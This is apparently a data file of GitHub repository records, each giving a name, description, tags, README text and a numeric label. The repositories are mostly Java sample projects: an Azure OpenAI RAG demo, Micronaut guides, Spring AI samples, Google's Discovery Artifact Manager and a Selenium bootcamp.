handling of fault cases - The schema makes use of Strings as identifiers instead of UUIDs With respect to that last point about UUIDs: for this service I take the same approach that I did for the book. When working with small scale examples, it is simpler to deal with IDs that are human readable strings. If I were intending to build a real system out of this or even implement more of the "ecosystem" of services implied by the book's data model, I would move toward using UUIDs for identifiers. For more of my thinking on this topic, please read the [Identity blog post][identity] from my [Data Model Meets World][dmmw] series. ## Credits I found [this tutorial][tutorial] helpful in getting this implementation up and running quickly. Special thanks to [Cedrick Lunven][clun] for his help in modernizing this app. Comments, improvements and feedback are welcome. Copyright 2017-2020 Jeff Carpenter Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. [tutorial]: http://www.springboottutorial.com/creating-rest-service-with-spring-boot [schema]: /src/main/resources/reservation.cql [dmmw]: https://medium.com/@jscarp/data-model-meets-world-c67a46681b39 [identity]: https://medium.com/@jscarp/data-model-meets-world-part-ii-identity-crisis-d517d3d4c39a [chapter]: https://www.oreilly.com/ideas/cassandra-data-modeling [driver]: https://docs.datastax.com/en/developer/java-driver/4.1/ [docker-hub]: https://hub.docker.com/_/cassandra [live-training]: https://www.oreilly.com/live-training/ [clun]: https://github.com/clun [testcontainers]: https://www.testcontainers.org/
1
Azure-Samples/azure-search-openai-demo-java
This repo is the Java version of Microsoft's sample app for ChatGPT + Enterprise data.
null
--- page_type: sample languages: - azdeveloper - java - bicep - typescript - html products: - azure - azure-openai - active-directory - azure-cognitive-search - azure-app-service - azure-container-apps - azure-kubernetes-service - azure-sdks - github - document-intelligence - azure-monitor - azure-pipelines urlFragment: azure-search-openai-demo-java name: ChatGPT + Enterprise data (Java) on App Service, Azure Container Apps, and Azure Kubernetes Service description: A Java sample app that chats with your data using OpenAI and AI Search. --- <!-- YAML front-matter schema: https://review.learn.microsoft.com/en-us/help/contribute/samples/process/onboarding?branch=main#supported-metadata-fields-for-readmemd --> # ChatGPT + Enterprise data with Azure OpenAI and Azure AI Search - Java Version This repo is the Java version of the well known [ChatGPT + Enterprise data code sample](https://github.com/Azure-Samples/azure-search-openai-demo) originally written in python. It demonstrates best practices for creating ChatGPT-like experiences over your own data using the Retrieval Augmented Generation pattern. It uses Azure OpenAI Service to access the ChatGPT model `gpt-35-turbo`, and Azure Azure AI Search for data indexing and retrieval. This repository includes sample data so it's ready to try end to end. In this sample application we use a fictitious company called Contoso Electronics, and the experience allows its employees to ask questions about the benefits, internal policies, as well as job descriptions and roles. What this demo application does: * Chat and Q&A interfaces * Explores various options to help users evaluate the trustworthiness of responses with citations, tracking of source content, etc. * Shows possible approaches for data preparation, prompt construction, and orchestration of interaction between model (ChatGPT) and retriever (Azure AI Search) * Shows possible AI orchestration implementation using the plain Java Open AI sdk or the Java Semantic Kernel sdk * Settings directly in the UX to tweak the behavior and experiment with options ![Chat screen](docs/chatscreen.png) ## Solution Architecture and deployment options ![Microservice RAG Architecture](docs/aks/aks-hla.png) This sample supports different architectural styles. It can be deployed as standalone app on top of Azure App Service or as a microservice event driven architecture with web frontend, AI orchestration and document ingestion apps hosted by Azure Container Apps or Azure Kubernetes Service. - For **Azure App Service** deployment, see [here](docs/app-service/README-App-Service.md). - For **Azure Container Apps** deployment, see [here](docs/aca/README-ACA.md). - For **Azure Kubernetes Service** deployment, see [here](docs/aks/README-AKS.md). ## RAG Implementation Options This repo is focused to showcase different options to implement **"chat with your private documents"** scenario using RAG patterns with Java, Azure OpenAI and Semantic Kernel. Below you can find the list of available implementations. | Conversational Style | RAG Approach | Description | Java Open AI SDK | Java Semantic Kernel | |:---------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:-----------------------------------------------------------------------------------------------|:----------------------| | One Shot Ask | [PlainJavaAskApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/PlainJavaAskApproach.java) | Use Azure AI Search and Java OpenAI APIs. It first retrieves top documents from search and use them to build a prompt. Then, it uses OpenAI to generate an answer for the user question.Several search retrieval options are available: Text, Vector, Hybrid. When Hybrid and Vector are selected an additional call to OpenAI is required to generate embeddings vector for the question. | :white_check_mark: | :x: | | Chat | [PlainJavaChatApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/chat/approaches/PlainJavaChatApproach.java) | Use Azure AI Search and Java OpenAI APIs. It first calls OpenAI to generate a search keyword for the chat history and then answer to the last chat question.Several search retrieval options are available: Text, Vector, Hybrid. When Hybrid and Vector are selected an additional call to OpenAI is required to generate embeddings vector for the chat extracted keywords. | :white_check_mark: | :x: | | One Shot Ask | [JavaSemanticKernelWithMemoryApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/JavaSemanticKernelWithMemoryApproach.java) | Use Java Semantic Kernel framework with built-in MemoryStore for embeddings similarity search. A semantic function [RAG.AnswerQuestion](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerQuestion/config.json) is defined to build the prompt using Memory Store vector search results.A customized version of SK built-in [CognitiveSearchMemoryStore](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/memory/CustomAzureCognitiveSearchMemoryStore.java) is used to map index fields populated by the documents ingestion process. | :x: | This approach is currently disabled within the UI, memory feature will be available in the next java Semantic Kernel GA release | | One Shot Ask | [JavaSemanticKernelChainsApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/JavaSemanticKernelChainsApproach.java) | Use Java Semantic Kernel framework with semantic and native functions chaining. It uses an imperative style for AI orchestration through semantic kernel functions chaining. [InformationFinder.SearchFromQuestion](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/retrieval/semantickernel/CognitiveSearchPlugin.java) native function and [RAG.AnswerQuestion](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerQuestion/config.json) semantic function are called sequentially. Several search retrieval options are available: Text, Vector, Hybrid. | :x: | :white_check_mark: | | Chat | [JavaSemanticKernelWithMemoryApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/chat/approaches/semantickernel/JavaSemanticKernelWithMemoryChatApproach.java) | Use Java Semantic Kernel framework with built-in MemoryStore for embeddings similarity search. A semantic function [RAG.AnswerConversation](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerQuestion/config.json) is defined to build the prompt using Memory Store vector search results. A customized version of SK built-in [CognitiveSearchMemoryStore](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/ask/approaches/semantickernel/memory/CustomAzureCognitiveSearchMemoryStore.java) is used to map index fields populated by the documents ingestion process. | :x: | :x: This approach is currently disabled within the UI, memory feature will be available in the next java Semantic Kernel GA release | | Chat | [JavaSemanticKernelChainsApproach](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/chat/approaches/semantickernel/JavaSemanticKernelChainsChatApproach.java) | Use Java Semantic Kernel framework with semantic and native functions chaining. It uses an imperative style for AI orchestration through semantic kernel functions chaining. [InformationFinder.SearchFromConversation](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/java/com/microsoft/openai/samples/rag/retrieval/semantickernel/CognitiveSearchPlugin.java) native function and [RAG.AnswerConversation](https://github.com/Azure-Samples/azure-search-openai-demo-java/blob/main/app/backend/src/main/resources/semantickernel/Plugins/RAG/AnswerConversation/config.json) semantic function are called sequentially. Several search retrieval options are available: Text, Vector, Hybrid. | :x: | :white_check_mark: |
1
khannedy/spring-command-pattern
Sample Project for Spring Web Reactive + Reactive Mongo + Command Pattern
command-pattern reactor spring spring-data-mongodb spring-reactive web-reactive
null
1
appiumbook/appiumbook
This repository contains all the sample examples discussed on Appium Book.
null
null
1
zavenco/DigitalImageProcessing
This is the sample application that uses OpenCV library.
null
null
1
SaiUpadhyayula/SpringShoppingStore
This project is a sample eCommerce ShoppingStore application created for learning purposes
null
#SpringShoppingStore SpringShoppingStore is a sample shopping store which is under development. This project uses Spring MVC,Twitter Bootstrap, JDBC implementations. I am developing a more advanced Shopping Store in this repository : https://github.com/SaiUpadhyayula/NgSpringShoppingStore This app is developed using Spring Boot, MongoDB, Spring Security with JWT, ElasticSearch, Redis Features -------- Managing the Catalog of Products,Categories and Subcategories Shopping Cart Wishlist Order Management Order History Customer Management Customer Addresses Management Payments and Processing(Cash on Delivery) Sending emails after customer registration and order placement Features yet to be added ------------------------ Product Search Discounts on Products Admin Console Payment Gateway Processing(Credit Cards/Debit Cards) Generating Reports of Customer Orders and send the reports through email to the customer Cloning the repository -------------------------- To clone this repository use the command ``` $ git clone https://github.com/SaiUpadhyayula/SpringShoppingStore.git ```
1
ozlerhakan/java9-module-examples
a list of Java 9 module samples to dive into the modular world
java java9 java9-jigsaw jigsaw modularity module serviceloader
null
0
micronaut-projects/micronaut-guides
Guides and Tutorials on how to use Micronaut including sample code
groovy java kotlin micronaut tutorials
# Micronaut Guides This is the main repository for the [Micronaut Guides](https://guides.micronaut.io). ## Build the guides To build all the guides run: ```shell $ ./gradlew build ``` This will generate all the projects and guides in `build/dist` and this is what needs to be published to GitHub Pages. To build a single guide, run the dynamic task created by `GuidesPlugin`; convert the kabab case guide directory name to lowerCamelCase and add "Build", e.g. to build `micronaut-http-client`, run ```shell ./gradlew micronautHttpClientBuild ``` ## Create a new guide For a high level overview of the Guides Infrastructure, take a look at this [blog post](https://micronaut.io/2021/04/12/improving-the-micronaut-guides-infrastructure/). All the guides leverage [Micronaut Starter](https://github.com/micronaut-projects/micronaut-starter) core to create the projects. The idea is that one guide can generate up to six different projects, one per language (Java, Groovy and Kotlin) and build tool (Gradle and Maven). ### Guide structure All the guides are in the `guides` directory in separate subdirectories. Inside the directory, the main file is `metadata.json` that describes the guide. All the fields are declared in [GuideMetadata](https://github.com/micronaut-projects/micronaut-guides/blob/master/buildSrc/src/main/groovy/io/micronaut/guides/GuideMetadata.groovy) class. ```json { "title": "Micronaut HTTP Client", "intro": "Learn how to use Micronaut low-level HTTP Client. Simplify your code with the declarative HTTP client.", "authors": ["Sergio del Amo", "Iván López"], "tags": ["client", "rx", "flowable", "json-streams"], "category": "Getting Started", "publicationDate": "2018-07-02", "apps": [ { "name": "default", "features": ["graalvm", "reactor"] } ] } ``` Besides, the obvious fields that doesn't need any further explanation, the other are: - `tags`: List of tags added to the guide. You don't need to include the language here because it is added automatically when generating the json file for the Guides webpage. - `category`: Needs to be a valid value from the [Category](https://github.com/micronaut-projects/micronaut-guides/blob/master/buildSrc/src/main/java/io/micronaut/guides/Category.java) enum. - `buildTools`: By default we generate the code in the guides for Gradle and Maven. If a guide is specific only for a build tool, define it here. - `languages`: The guides should be written in the three languages. Sometimes we only write guides in one language or the guide only supports a specific language. - `testFramework`: By default Java and Kotlin applications are tested with JUnit5 and Groovy applications with Spock. In some cases we have Java guides that are tested with Spock. Use this property to configure it. - `skipGradleTests`: Set it to `true` to skip running the tests for the Gradle applications for the guide. This is useful when it's not easy to run tests on CI, for example for some cloud guides. - `skipMavenTests`: Same as `skipGradleTests` but for Maven applications. - `minimumJavaVersion`: If the guide needs a minimum Java version (for example JDK 17 for Records), define it in this property. - `maximumJavaVersion`: If the guide needs a maximum Java version (for example JDK 11 for Azure Functions), define it in this property. - `zipIncludes`: List of additional files to include in the generated zip file for the guide. - `publish`: defaults to true for regular guides; set to false for partial/base guides - `base`: defaults to null; if set, indicates directory name of the base guide to copy before copying the current - `apps`: List of pairs `name`-`features` for the generated application. There are two types of guides, most of the guides only generate one application (single-app). In this case the name of the applications needs to be `default`. There are a few guides that generate multiple applications, so they need to be declared here: ```json ... "apps": [ { "name": "bookcatalogue", "features": ["tracing-jaeger", "management"] }, { "name": "bookinventory", "features": ["tracing-jaeger", "management"] }, { "name": "bookrecommendation", "features": ["tracing-jaeger", "management", "reactor"] } ] ``` The features need to be **valid** features from Starter because the list is used directly when generating the applications using Starter infrastructure. If you need a feature that is not available on Starter, create it in `buildSrc/src/main/java/io/micronaut/guides/feature`. Also declare the GAV coordinates and version in `buildSrc/src/main/resources/pom.xml`. Dependabot is configured in this project to look for that file and send pull requests to update the dependencies. Inside the specific guide directory there should be a directory per language with the appropriate directory structure. All these files will be copied into the final guide directory after the guide is generated. ```shell micronaut-http-client ├── groovy │ └── src │ ├── main │ │ └── groovy │ │ └── example │ │ └── micronaut │ └── test │ └── groovy │ └── example │ └── micronaut ├── java │ └── src │ ├── main │ │ └── java │ │ └── example │ │ └── micronaut │ └── test │ └── java │ └── example │ └── micronaut ├── kotlin │ └── src │ ├── main │ │ └── kotlin │ │ └── example │ │ └── micronaut │ └── test │ └── kotlin │ └── example │ └── micronaut └── src └── main └── resources ``` For multi-applications guides there needs to be an additional directory with the name of the application declared in `metadata.json` file: ```shell micronaut-microservices-distributed-tracing-zipkin ├── bookcatalogue │ ├── groovy │ │ ... │ ├── java │ │ ... │ └── kotlin │ ... ├── bookinventory │ ├── groovy │ │ ... │ ├── java │ │ ... │ └── kotlin │ ... └── bookrecommendation ├── groovy │ ... ├── java │ ... └── kotlin ``` ### Writing the guide There is only one Asciidoctor file per guide in the root directory of the guide (sibling to `metadata.json`). This unique file is used to generate all the combinations for the guide (language and build tool) so we need to take that into account when writing the guide. Name the Asciidoctor file the same as the directory, with an "adoc" extension, e.g. `micronaut-http-client.adoc` for the `micronaut-http-client` guide directory. We don't really write a valid Asciidoctor file but our "own" Asciidoctor with custom kind-of-macros. Then during the build process we render the final HTML for the guide in two phases. In the first one we evaluate all of our custom macros and include and generate a new language-build tool version of the guide in `src/doc/asciidoc`. This directory is excluded from source control and needs to be considered temporary. Then we render the final HTML of the (up to) six guides from that generated and valid Asciidoctor file. #### Placeholders You can use the following placeholders while writing a guide: * `@language@` * `@guideTitle@` * `@guideIntro@` * `@micronaut@` * `@lang@` * `@build@` * `@testFramework@` * `@authors@` * `@languageextension@` * `@testsuffix@` * `@sourceDir@` * `@minJdk@` * `@api@` * `@features@` * `@features-words@` #### Common snippets We have small pieces of text that are used in different guides. To avoid the duplication we have common snippets in the `src/docs/common` directory. For example the file `common-header-top.adoc`: ```asciidoc = @guideTitle@ @guideIntro@ Authors: @authors@ Micronaut Version: @micronaut@ ``` Will render the title, description, authors and version of all the guides. The variables defined between `@` signs will be evaluated and replaced during the first stage of the asciidoctor render. For example, for the Micronaut HTTP Client guide, the previous common snippet will generate: ```asciidoc // Start: common-header-top.adoc = Micronaut HTTP Client Learn how to use Micronaut low-level HTTP Client. Simplify your code with the declarative HTTP client. Authors: Sergio del Amo, Iván López Micronaut Version: 3.2.7 // End: common-header-top.adoc ``` #### Custom macros There are a number of custom macros available to make it easy writing a single asciidoctor file for all the guides and include the necessary source files, resources,... This is really important because when we include a source code snippet the base directory will change for every language the guide is written. The following snippet from the HTTP Client guide: ```asciidoc source:GithubConfiguration[] ``` Will generate the following Asciidoctor depending on the language of the guide: - Java: ```asciidoc [source,java] .src/main/java/example/micronaut/GithubConfiguration.java ---- include::{sourceDir}/micronaut-http-client-gradle-java/src/main/java/example/micronaut/GithubConfiguration.java[] ---- ``` - Groovy: ```asciidoc [source,groovy] .src/main/groovy/example/micronaut/GithubConfiguration.groovy ---- include::{sourceDir}/micronaut-http-client-gradle-groovy/src/main/groovy/example/micronaut/GithubConfiguration.groovy[] ---- ``` - Kotlin: ```asciidoc [source,kotlin] .src/main/kotlin/example/micronaut/GithubConfiguration.kt ---- include::{sourceDir}/micronaut-http-client-gradle-kotlin/src/main/kotlin/example/micronaut/GithubConfiguration.kt[] ---- ``` As you can see, the macro takes care of the directories (`src/main/java` vs `src/main/groovy` vs `src/main/kotlin`) and the file extension. Following this same approach there are macros like: - `source`: Already explained. - `resource`: To include a file from the `src/main/resources` directory. - `test`: To include a file from the `src/main/test` directory. This macro also takes care of the suffix depending on the test framework. For example, with `test:GithubControllerTest[]` the macro will reference the file `GithubControllerTest.java` (or .kt) for Java and Kotlin and `GithubControllerSpec.groovy` for Groovy. - `testResource`: To include a file from the `src/main/test/resources` directory. - `callout`: To include a common callout snippet. In all the cases it is possible to pass additional parameters to the macros to customise them. For example, to extract a custom tag from a snippet, we can do `resource:application.yml[tag=githubconfig]`. Look for usages of those macros in the `guides` directory to find more examples. #### Special custom blocks There are also special custom blocks to exclude some code to be included in the generated guide based on some condition. This is useful when explaining something specific of the build tool (like how to run the tests with Gradle or Maven) or to exclude something depending on the language (for example do not render the GraalVM section in Groovy guides, as Groovy is not compatible with GraalVM). Example: ```asciidoc :exclude-for-languages:kotlin <2> The Micronaut framework will not load the bean unless configuration properties are set. :exclude-for-languages: :exclude-for-languages:java,groovy <2> Kotlin doesn't support runtime repeatable annotations (see https://youtrack.jetbrains.com/issue/KT-12794[KT-12794]. We use a custom condition to enable the bean where appropriate. :exclude-for-languages: ``` For Java and Groovy guides the first block will be included. For Kotlin guide, the second block will be included. Example for build tool: ```asciidoc :exclude-for-build:maven Now start the application. Execute the `./gradlew run` command, which will start the application on port 8080. :exclude-for-build: :exclude-for-build:gradle Now start the application. Execute the `./mvnw mn:run` command, which will start the application on port 8080. :exclude-for-build: ``` For a Gradle guide, the first block will be included. For a Maven guide, the second one will be included. As before, look for usages of the macro in the `guides` directory for more examples. ### New Guide Template To create a new guide use the following template as the base asciidoc file: ```asciidoc common:header.adoc[] common:requirements.adoc[] common:completesolution.adoc[] common:create-app.adoc[] TODO: Describe the user step by step how to write the app. Use includes to reference real code: Example of a Controller source:HelloController[] Example of a Test test:HelloControllerTest[] common:testApp.adoc[] common:runapp.adoc[] common:graal-with-plugins.adoc[] :exclude-for-languages:groovy TODO describe how you consume the endpoints exposed by the native executable with curl :exclude-for-languages: TODO Use the generic next step common:next.adoc[] TODO or a personalised guide for the guide: == Next steps TODO: link to the documentation modules you used in the guide ``` ### Testing the guide When working on a new guide, generate it as explained before. The guide will be available in the `build/dist` directory and the applications will be in the `build/code` directory. You can open any directory in `build/code` directly in your IDE to make any changes but keep in mind copying the code back to the appropriate directory. In the `build/code` directory a file `test.sh` is created to run all the tests for the guides generated. Run it locally to make sure it passes before submitting a new pull request. You can run this test with a gradle task ```bash ./gradlew :____RunTestScript ``` where `____` is the camel-case name of your guide. eg: ```bash ./gradlew micronautFlywayRunTestScript ``` to run all the tests for the `micronaut-flyway` guide. ## Upgrade Micronaut version When a new Micronaut version is released, update the [version.txt](https://github.com/micronaut-projects/micronaut-guides/blob/master/version.txt) file in the root directory. Submit a new pull request and if the build passes, merge it. A few minutes later all the guides will be upgraded to the new version. ## Deployment Guides are published to [gh-pages](https://pages.github.com) following the same branch structure as Micronaut Core: - One directory per Micronaut minor version: `3.0.x`, `3.1.x`, `3.2.x`,... - One directory with the latest version of the guide: `latest` ## GitHub Actions There are two main jobs: - Java CI: Run everytime we send a pull request or something is merged in `master`. The `test.sh` script explained before is executed. - Java CI SNAPSHOT: There is a cronjob that runs daily the tests for the new Micronaut patch and minor versions to make sure everything will work when we release new versions in the future.
1
aalmiray/sb-cli
Sample Spring Boot CLI application
null
null
1
googleapis/discovery-artifact-manager
The Discovery Artifact Manager is intended to facilitate testing, publishing, and synchronization of generators and artifacts for client libraries and generated code samples of Google APIs defined by the API Discovery Service.
null
# Introduction The Discovery Artifact Manager is intended to facilitate testing, publishing, and synchronization of generators and artifacts for client libraries and generated code samples of Google APIs defined by the API Discovery Service. This repo includes copies of the following in separate top-level directories: - Discovery files from the [API Discovery Service](https://developers.google.com/discovery/) - the Google API client library generator (used to generate Java and PHP client libraries) - some of the [Discovery-based Google API client libraries](https://developers.google.com/discovery/libraries), along with their generators - the code generation [toolkit](https://github.com/googleapis/toolkit/) used to generate code samples for client libraries. **NOTE**: This repo only contains a cache of the above items; it is not their source of truth. Changes to Toolkit and Discovery-based Google API client libraries should be directed to their respective repos. There is no guarantee that sources or Discovery files in this repo are up to date. ## Local machine setup Install [git-subrepo](https://github.com/ingydotnet/git-subrepo) on your local machine. ## Adding a new client library repo Use the `git subrepo clone` command, from the root directory of this repository. The NodeJS library, for example, is installed using: ``` shell git subrepo clone https://github.com/google/google-api-nodejs-client.git clients/nodejs/google-api-nodejs-client ``` ## Modifying a client library repo To make changes to a repo, use the `git subrepo pull` and `git subrepo push` commands. The former will merge your local client with fetched upstream changes, and the latter will actually do the push to the upstream sub-repo. For example, to push the PHP client library: ``` shell git subrepo pull clients/php/google-api-php-client-services git subrepo push clients/php/google-api-php-client-services ``` During the course of your local work, you may find yourself deciding to reset your HEAD locally. If you do this after a subrepo push, trying to reset your HEAD to before the push, then this can cause some complications: you would not want `github subrepo` to subsequently pull again, as it normally does when pushing (since that will merge the upstream changes you pushed earlier). Instead, you can force-push your changes by using `git subrepo push --force`. We're still learning the quirks of `git subrepo`, but a good rule of thumb is to be extremely careful when manipulating references that have already been synced (push or pull) with the external subrepo locations. After you push your subrepo, you should also push `discovery-artifact-manager` to your review branch. ## Pushing changes for review When you make a change to code that lives in `discovery-artifact-manager`, either directly or via subrepos, you should stage your code to your own Github review branch and then create a Pull Request from there to the Github `master` branch. 1. Create a review branch on Github. We'll refer to the name of the branch as `${REVIEW_BRANCH}`. 1. Decide what local branch you'll push. Often, this will be master. We'll refer to this branch as `${LOCAL_BRANCH}` 1. From your local machine, push to the review branch: ``` git push origin ${LOCAL_BRANCH}:${REVIEW_BRANCH} ``` 1. On Github, issue a Pull Request against the `master` branch. ## Updating local Discovery doc cache To aid hermetic testing of client libraries and samples (avoiding synchronization issues), the `discoveries` directory hosts a local cache of Discovery docs from the Discovery service. This cache may be updated from current live versions by running ``` shell ./src/main/updatedisco/updatedisco ``` from any subdirectory. **This cache is not yet used for testing by other tools.** ## Running tests ```bash cd toolkit ./gradlew test ``` ## Updating samples To update samples, you will both need to make edits in the appropriate `.snip` file, e.g., `toolkit/src/main/resources/com/google/api/codegen/nodejs/sample.snip`, and update tests. ### Updating tests * `cd toolkit`. * run: `./gradlew test`, this will generate the expected test output in `/tmp/com.google.api.codegen_testdata/`. * copy the snapshot files generated in `/tmp` to the appropriate location, in the case of this example: `src/test/java/com/google/api/codegen/testdata/discoveries/nodejs/`. * make sure that the samples look appropriate. * and _finally_, re-run tests.
0
ThomasVitale/llm-apps-java-spring-ai
Samples showing how to build Java applications powered by Generative AI and LLMs using Spring AI.
embeddings generative-ai large-language-models llm ollama openai rag spring-ai
# LLM Applications with Java and Spring AI Samples showing how to build Java applications powered by Generative AI and LLMs using [Spring AI](https://docs.spring.io/spring-ai/reference/). ## Pre-Requisites * Java 21 * Docker/Podman * [OpenAI](http://platform.openai.com) API Key (optional) * [Ollama](https://ollama.ai) (optional) ## Content ### 0. Use Cases _Coming soon_ ### 1. Chat Models | Project | Description | |---------------------------------------------------------------------------------------------------------------------------|---------------------------------------| | [chat-models-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/01-chat-models/chat-models-ollama) | Text generation with LLMs via Ollama. | | [chat-models-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/01-chat-models/chat-models-openai) | Text generation with LLMs via OpenAI. | ### 2. Prompts | Project | Description | |------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------| | [prompts-basics-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-basics-ollama) | Prompting using simple text with LLMs via Ollama. | | [prompts-basics-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-basics-openai) | Prompting using simple text with LLMs via OpenAI. | | [prompts-messages-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-messages-ollama) | Prompting using structured messages and roles with LLMs via Ollama. | | [prompts-messages-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-messages-openai) | Prompting using structured messages and roles with LLMs via OpenAI. | | [prompts-templates-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-templates-ollama) | Prompting using templates with LLMs via Ollama. | | [prompts-templates-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/02-prompts/prompts-templates-openai) | Prompting using templates with LLMs via OpenAI. | ### 3. Output Parsers | Project | Description | |------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------| | [output-parsers-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/03-output-parsers/output-parsers-ollama) | Parsing the LLM output as structured objects (Beans, Map, List) via Ollama. | | [output-parsers-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/03-output-parsers/output-parsers-openai) | Parsing the LLM output as structured objects (Beans, Map, List) via Open AI. | ### 4. Embedding Models | Project | Description | |------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------| | [embedding-models-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/04-embedding-models/embedding-models-ollama) | Vector transformation (embeddings) with LLMs via Ollama. | | [embedding-models-openai](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/04-embedding-models/embedding-models-openai) | Vector transformation (embeddings) with LLMs via OpenAI. | ### 5. Document Readers | Project | Description | |----------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------| | [document-readers-json-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/05-document-readers/document-readers-json-ollama) | Reading and vectorizing JSON documents with LLMs via Ollama. | | [document-readers-pdf-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/05-document-readers/document-readers-text-ollama) | Reading and vectorizing PDF documents with LLMs via Ollama. | | [document-readers-text-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/05-document-readers/document-readers-text-ollama) | Reading and vectorizing text documents with LLMs via Ollama. | ### 6. Document Transformers | Project | Description | |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------| | [document-transformers-metadata-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/06-document-transformers/document-transformers-metadata-ollama) | Enrich documents with keywords and summary metadata for enhanced retrieval via Ollama. | | [document-transformers-splitters-ollama](https://github.com/ThomasVitale/llm-apps-java-spring-ai/tree/main/06-document-transformers/document-transformers-splitters-ollama) | Divide documents into chunks to fit the LLM context window via Ollama. | ### 7. Document Writers _Coming soon_ ### 8. Vector Stores _Coming soon_ ### 9. Tools _Coming soon_ ### 10. Image Models _Coming soon_ ## References and Additional Resources * [Spring AI](https://docs.spring.io/spring-ai/reference/index.html) * [Spring AI Azure Workshop](https://github.com/Azure-Samples/spring-ai-azure-workshop)
0
yfain/Java4Kids_code
The sources of code sample for the Java For Kids book
null
null
1
afester/FranzXaver
JavaFX components, tools, and sample applications
null
null
1
nadvolod/selenium-java
This is the sample repository that we use in the Complete Selenium WebDriver with Java Bootcamp
java selenium test-automation
![Java CI with Maven](https://github.com/nadvolod/selenium-java/workflows/Java%20CI%20with%20Maven/badge.svg) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/95a6a0b3fe3f418fb7ff035fac5d2f87)](https://app.codacy.com/manual/nadvolod/selenium-java?utm_source=github.com&utm_medium=referral&utm_content=nadvolod/selenium-java&utm_campaign=Badge_Grade_Dashboard) The Java Software Engineer in Test (SDET) curriculum is your ticket to a wonderful test automation career. 🌎 5 months of world-class training 💻 Gain real-world experience through automation with real customers 🚀 Build out your open source coding skills through group projects 💼 Interview training, on-the-job guidance, and live support to ensure your success in your new role. 📅 100% virtual education Join the ranks of the world's elite software developers and test automation experts 🌟 👉 Join now, be the first to know about the launch and enjoy exclusive benefits: https://ultimateqa.ck.page/academy-coming-soon # The Bootcamp that Will Make You Expert in 💪 Mastering automation testing from A to Z—be the go-to person to improve software quality 🚀 Unleashing the potential of using Selenium WebDriver for automation 🧠 Mastering Java for Software Automation Engineers—the way to definitely go pro 🏆 Implementing automation best practices established over decades—as the top professionals do 👍 Using ATDA—a secret automation technique to create top-quality tests 🦸‍♀️️Creating a test automation framework in less than 45 minutes ## Some Topics You Will Master ### How to achieve parallelization with JUnit and TestNg [![Parallel Test Execution with JUnit and TestNg](http://img.youtube.com/vi/ufccoaURMIc/0.jpg)](https://youtu.be/ufccoaURMIc "Parallel Test Execution with JUnit and TestNg") ### How to use the Page Object Model design pattern effectively ### Continuous integration with SauceLabs and GitHub ### Cross Browser and Cross Platform Automation using SauceLabs ### How to get awesome reports using the TestProject SDK ``` FIRST 150 PEOPLE GET 15% DISCOUNT! USE COUPON CODE github-15 AT CHECKOUT ``` [Complete Selenium WebDriver with Java Bootcamp](https://ultimateqa.com/selenium-webdriver-java-course/)
1
playgameservices/8bitartist
